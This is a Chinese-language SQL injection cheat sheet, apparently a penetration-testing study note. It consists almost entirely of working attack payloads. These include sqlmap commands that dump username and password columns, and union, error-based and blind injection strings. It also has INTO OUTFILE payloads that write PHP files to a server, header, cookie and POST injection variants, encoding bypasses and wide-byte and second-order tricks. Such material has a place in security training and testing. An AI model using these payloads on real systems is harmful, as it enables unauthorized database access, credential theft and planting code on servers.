SQL注入
sql注入验证:
\
'
and 1=1
and 1=2
sqlmap基本命令
sqlmap -r *.txt -p id
sqlmap -u '192.168.1.101/cms/show.php?id=38' --dbs
sqlmap -u '192.168.1.101/cms/show.php?id=38' -D cms --tables
sqlmap -u '192.168.1.101/cms/show.php?id=38' -D cms -T cms_users --columns
sqlmap -u '192.168.1.101/cms/show.php?id=38' -D cms -T cms_users -C username,password --dump --batch
注入
order by 判断字段数
union select 联合查询获取表名、字段名、字段值
?id=1' order by 3 --
?id=0' union select 1,2,3 --
获取表名
0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --
获取字段名
0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --
获取字段值
0' union select 1,group_concat(username,0x3a,password),3 from users--
盲注分类:
时间盲注:
?id=1' if(ascii(substr(database(),1,1)=115,1,sleep(3))) --
当数据库第一个字母的ascii码是115时,执行sleep()
布尔盲注:
?id=1' and length(database())=8 --
文件读取和写入
select load_file('path')
union select 1,'<?php phpinfo();?>',3 into outfile 'path' --
报错注入
rand() 随机函数
floor() 取整函数
count() 计数函数
group by clause 分组函数
获取数据库
0' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --
获取表名
0' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --
获取用户信息
0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --
双引号获取数据库
0" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --
注入绕过
大小写、双写、编码、内联注释
POST盲注
admin' and (select (if(length(database())>5,sleep(5),null))) --
admin' and (length(database())>5) --
User-Agent注入:
user-agent处注入
Referer注入:
referer处注入
payload:
' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1'='1
' or '1'='1
' or (length(database())) >8 or if(1=1, sleep(5), null) or '1' = '1
sqlmap -r指定*处测试
update语句
update table_name set password=test where id=1
passwd=123'or updatexml(1,concat(0x7e,database(),0x7e),1) #
cookie注入
cookiebase64注入
base64编码
==结束符
urlencode
%0a 换行
%0c 新一页
%0d return功能
%09 tab键
%20 空格
&& and
|| or
GBK宽字节注入
-1%df' union select 1,2,3 --
%81
二次注入
用户名为admin' -- -
updatexml()与extractvalue()
select * from table where id=1 and updatexml(-1,concat(0x7e,database(),0x7e),1)
select * from user where id=1 and extractvalue(-1,concat(0x7e,version(),0x7e))